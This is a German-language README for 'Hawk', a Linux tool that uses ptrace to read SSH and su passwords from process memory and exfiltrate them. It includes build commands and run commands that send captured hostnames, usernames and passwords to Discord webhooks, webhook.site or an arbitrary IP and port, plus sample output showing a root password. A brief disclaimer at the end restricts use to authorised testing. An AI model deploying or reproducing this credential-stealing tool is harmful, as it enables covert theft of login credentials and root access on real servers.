
Golang-Tool zum Exfiltrieren von Passwörtern, die über die Dienste sshd und su gefunden wurden.
Stilles Abfangen von SSH- und SU-Anmeldeinformationen in Echtzeit
Hawk überwacht sshd und su-Prozesse und extrahiert mithilfe von ptrace Passwörter aus dem Speicher, ohne Zielprozesse zu verändern. Null Schreibzugriffe. Reines, schreibgeschütztes Abfangen von Anmeldeinformationen.

Hawk nutzt das Linux-/proc-Dateisystem, um SSH- und SU-Prozesse zu entdecken, und verwendet dann ptrace, um sich anzuhängen und Syscalls abzufangen. Wenn die Passwortauthentifizierung erfolgt, liest es das Passwort direkt aus dem Prozessspeicher während des write()-Syscalls – völlig transparent für den Zielprozess. Die Anmeldeinformationen werden per Webhook exfiltriert oder an die Standardausgabe ausgegeben.
Ausführlicher Artikel: Blogbeitrag
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk erkennt Discord-Webhooks automatisch und sendet formatierte Nachrichten:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
Einrichtung: Erstellen Sie einen Webhook in Ihrem Discord-Server gemäß der Anleitung zu Discord-Webhooks. Die Anmeldeinformationen erscheinen in Ihrem Kanal, formatiert mit Hostname, Benutzername und Passwort.
Für andere Webhook-Dienste (webhook.site, benutzerdefinierte Server usw.):
# HTTPS (auto-detected)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# Auto HTTPS if no protocol specified
./hawk webhook.example.com/path
Kein Webhook? Anmeldeinformationen werden in stdout ausgegeben:
./hawk
Ausgabe:
hostname=server01 username=root password=SuperSecret123
/proc-Dateisystem eingehängtDieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Erlaubnis zum Testen haben.